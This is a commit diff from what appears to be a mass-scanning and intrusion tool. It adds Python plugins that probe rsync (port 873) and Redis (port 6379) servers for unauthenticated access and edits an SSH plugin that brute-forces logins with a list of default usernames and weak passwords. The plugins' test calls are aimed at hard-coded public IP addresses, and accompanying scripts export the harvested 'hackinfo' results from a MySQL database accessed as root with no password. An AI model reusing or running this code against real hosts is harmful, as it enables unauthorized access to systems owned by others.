add poc

elasticsearchmanage/mysql_ipmaindata_to_es.sh

@@ -9,7 +9,7 @@ echo '{
         "url": "jdbc:mysql://127.0.0.1:3306/datap",
         "user": "root",
         "password": "",
-        "sql": "select ip as _id,ip as ip,vendor as vendor, osfamily as osfamily, osgen as osgen ,accurate as accurate,updatetime as updatetime,hostname as hostname,state as state,mac as mac,country as country,country_id as country_id,area as area,area_id as area_id,region as region,region_id as region_id,city as city,city_id as city_id,county as county,county_id as county_id,isp as isp,isp_id as isp_id  from ip_maindata where updatetime>\"2016-05-29 14:40:00\"",
+        "sql": "select ip as _id,ip as ip,vendor as vendor, osfamily as osfamily, osgen as osgen ,accurate as accurate,updatetime as updatetime,hostname as hostname,state as state,mac as mac,country as country,country_id as country_id,area as area,area_id as area_id,region as region,region_id as region_id,city as city,city_id as city_id,county as county,county_id as county_id,isp as isp,isp_id as isp_id  from ip_maindata where updatetime>\"2016-06-10 00:00:00\"",
         "treat_binary_as_string": true,
         "elasticsearch": {
             "cluster": "datap",

elasticsearchmanage/mysql_snifferdata_to_es.sh

@@ -9,7 +9,7 @@ echo '{
         "url": "jdbc:mysql://127.0.0.1:3306/datap",
         "user": "root",
         "password": "",
-        "sql": "select CONCAT(ip,\":\",port) as _id,ip as ip,port as port,timesearch as timesearch,state as state,name as name,product as product,version as version,CONCAT(\"(\",script,\")\") as script, CONCAT(\"(\",detail,\")\") as detail,id as id, CONCAT(\"(\",head,\")\") as head,CONCAT(\"(\",hackinfo,\")\") as hackinfo,CONCAT(\"(\",keywords,\")\") as keywords,  CONCAT(\"(\",disclosure,\")\") as disclosure from snifferdata where timesearch>\"2016-05-29 14:40:00\"",
+        "sql": "select CONCAT(ip,\":\",port) as _id,ip as ip,port as port,timesearch as timesearch,state as state,name as name,product as product,version as version,CONCAT(\"(\",script,\")\") as script, CONCAT(\"(\",detail,\")\") as detail,id as id, CONCAT(\"(\",head,\")\") as head,CONCAT(\"(\",hackinfo,\")\") as hackinfo,CONCAT(\"(\",keywords,\")\") as keywords,  CONCAT(\"(\",disclosure,\")\") as disclosure from snifferdata where timesearch>\"2016-06-10 00:00:00\"",
         "treat_binary_as_string": true,
         "elasticsearch": {
             "cluster": "datap",

spidermanage/spidertool/template_identify/plugins/sshdeal.py

@@ -10,8 +10,8 @@ def ssh2(ip='',port='22',name='',productname=''):
 
     ssh=None
     userlist=['root','admin','hadoop']
-    passwd=['hadoop','root','123456','admin','','12345','111111','password','123123','1234','12345678','123456789','696969',
-            'abc123','qwerty','oracle']
+    passwd=['root','123456','admin','','12345','111111','password','123123','1234','12345678','123456789','696969',
+            'abc123','qwerty','oracle','hadoop']
     msg='1'
     for  username in  userlist:
         for i in passwd:
@@ -24,7 +24,7 @@ def ssh2(ip='',port='22',name='',productname=''):
                 hackinfo= ' ssh the password is :'+i
                 print ip+hackinfo
                 keywords='ssh'
-                break;
+                break
             except Exception,e:
                 keywords='ssh'
                 hackinfo=str(e)
@@ -44,6 +44,7 @@ def ssh2(ip='',port='22',name='',productname=''):
                 if e[0] in 'Authentication failed.':
                     continue
                 else:
+                    msg = None
                     break
             finally:
                 if ssh !=None:
@@ -53,6 +54,6 @@ def ssh2(ip='',port='22',name='',productname=''):
             break
     return head,ans,keywords,hackinfo
 if __name__ == "__main__":
-    temp=ssh2('192.168.1.142')
+    temp=ssh2('202.118.48.122')
     print temp
 

spidermanage/spidertool/template_identify/poc_file/plugins/application/rsync/__init__.py

@@ -0,0 +1,9 @@
+KEYWORDS = ['rsync', ]
+def rules(head='',context='',ip='',port='',productname={},keywords='',hackinfo=''):
+
+
+    if int(port) in [873] or productname.get('protocol','') in ['rsync']:
+        return True
+    else:
+
+        return False

spidermanage/spidertool/template_identify/poc_file/plugins/application/rsync/rsync_auth.py

@@ -0,0 +1,58 @@
+#!/usr/bin/env python
+# encoding: utf-8
+from t import T
+
+import socket
+
+import time
+
+
+class P(T):
+    def __init__(self):
+        T.__init__(self)
+
+    def verify(self,head='',context='',ip='',port='',productname={},keywords='',hackinfo=''):
+
+        result = {}
+        result['result']=False
+        s=None
+
+
+        try:
+
+            payload = '\x40\x52\x53\x59\x4e\x43\x44\x3a\x20\x33\x31\x2e\x30\x0a'
+            s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
+            socket.setdefaulttimeout(10)
+
+
+            s.connect((ip, int(port)))
+            s.sendall(payload)
+            time.sleep(2)
+            # server init.
+            initinfo = s.recv(400)
+            if "RSYNCD" in initinfo:
+                s.sendall("\x0a")
+                time.sleep(2)
+            modulelist = s.recv(200)
+
+            if len(modulelist) > 0:
+
+
+                result['result'] = True
+                result['VerifyInfo'] = {}
+                result['VerifyInfo']['type'] = 'rsync unauth access  vul'
+                result['VerifyInfo']['URL'] = ip
+                result['VerifyInfo']['Port'] = port
+
+                result['VerifyInfo']['result'] = str(modulelist)
+
+
+        except Exception,e:
+            print e.text
+        finally:
+            if s is not None:
+                s.close()
+            return result
+if __name__ == '__main__':
+    # print P().verify(ip='61.146.115.83',port='81')
+    print P().verify(ip='118.244.21.121', port='873')

spidermanage/spidertool/template_identify/poc_file/plugins/application/rsync/t.py

@@ -0,0 +1,40 @@
+#!/usr/bin/env python
+# encoding: utf-8
+
+
+class T(object):
+    def __init__(self):
+
+        self.result = {
+                'type': None,
+                'version': None,
+                }
+        self.keywords = []
+        self.versions = []
+    def match_rule(self,head='',context='',ip='',port='',productname={},keywords='',hackinfo='', **kw):
+##
+#head 返回的请求头
+#context　返回请求正文html代码
+#ip　请求ip
+#port 请求端口
+#productname 请求的组件产品
+#keywords 暂时已知的关键词组件
+#hackinfo 备用字段
+
+
+
+
+        return True
+
+    def verify(self,head='',context='',ip='',port='',productname={},keywords='',hackinfo=''):
+        result = {}
+        result['result']=False
+        return result
+    def attack(self,head='',context='',ip='',port='',productname={},keywords='',hackinfo=''):
+        result = {}
+        result['result']=False
+        return result
+    def parse_output(self, result):
+        result = {}
+        result['result']=False
+        return result

spidermanage/spidertool/template_identify/poc_file/plugins/component/redis/__init__.py

@@ -0,0 +1,9 @@
+KEYWORDS = ['redis', ]
+def rules(head='',context='',ip='',port='',productname={},keywords='',hackinfo=''):
+
+
+    if int(port) in [6379] or productname.get('protocol','') in ['redis']:
+        return True
+    else:
+
+        return False

spidermanage/spidertool/template_identify/poc_file/plugins/component/redis/redis_unauth.py

@@ -0,0 +1,48 @@
+#!/usr/bin/env python
+# encoding: utf-8
+from t import T
+
+import socket
+
+
+
+
+class P(T):
+    def __init__(self):
+        T.__init__(self)
+    def verify(self,head='',context='',ip='',port='',productname={},keywords='',hackinfo=''):
+
+        result = {}
+        result['result']=False
+        s=None
+
+
+        try:
+
+            payload = '\x2a\x31\x0d\x0a\x24\x34\x0d\x0a\x69\x6e\x66\x6f\x0d\x0a'
+            s = socket.socket()
+            socket.setdefaulttimeout(10)
+
+
+            s.connect((ip, int(port)))
+            s.send(payload)
+            recvdata = s.recv(1024)
+            if recvdata and 'redis_version' in recvdata:
+                result['result'] = True
+                result['VerifyInfo'] = {}
+                result['VerifyInfo']['type'] = 'redis unauth access  vul'
+                result['VerifyInfo']['URL'] = ip
+                result['VerifyInfo']['Port'] = port
+
+                result['VerifyInfo']['result'] = recvdata
+
+
+        except Exception,e:
+            print e.text
+        finally:
+            if s is not None:
+                s.close()
+            return result
+if __name__ == '__main__':
+    # print P().verify(ip='61.146.115.83',port='81')
+    print P().verify(ip='121.41.28.130', port='7002')

spidermanage/spidertool/template_identify/poc_file/plugins/component/redis/t.py

@@ -0,0 +1,40 @@
+#!/usr/bin/env python
+# encoding: utf-8
+
+
+class T(object):
+    def __init__(self):
+
+        self.result = {
+                'type': None,
+                'version': None,
+                }
+        self.keywords = []
+        self.versions = []
+    def match_rule(self,head='',context='',ip='',port='',productname={},keywords='',hackinfo='', **kw):
+##
+#head 返回的请求头
+#context　返回请求正文html代码
+#ip　请求ip
+#port 请求端口
+#productname 请求的组件产品
+#keywords 暂时已知的关键词组件
+#hackinfo 备用字段
+
+
+
+
+        return True
+
+    def verify(self,head='',context='',ip='',port='',productname={},keywords='',hackinfo=''):
+        result = {}
+        result['result']=False
+        return result
+    def attack(self,head='',context='',ip='',port='',productname={},keywords='',hackinfo=''):
+        result = {}
+        result['result']=False
+        return result
+    def parse_output(self, result):
+        result = {}
+        result['result']=False
+        return result